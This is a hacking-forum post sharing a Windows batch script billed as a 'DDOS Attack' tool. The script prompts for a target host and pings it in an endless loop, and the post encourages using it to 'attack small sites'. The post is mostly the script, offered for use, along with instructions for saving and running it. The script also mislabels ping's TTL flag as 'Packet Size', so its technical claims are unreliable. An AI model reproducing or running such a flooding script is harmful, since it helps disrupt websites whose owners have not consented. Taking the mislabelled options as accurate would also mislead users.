Thread: ddos small fun
View Single Post
  #1 Old 07-14-2016, 12:20 PM
g4lyfe
 
g4lyfe's Avatar
 
Join Date: Sep 2013
Posts: 344
g4lyfe is on a distinguished road
Exclamation ddos small fun

[HIDE]
Click here to see full text
Open New text document , paste code change font to (Lucida Fax )
---regular size 10 and save as .bat *


Code:
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.you got one
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
[/HIDE]

[HIDE]run ping and attack small sites , order rdp [/HIDE]
g4lyfe is offline   Reply With Quote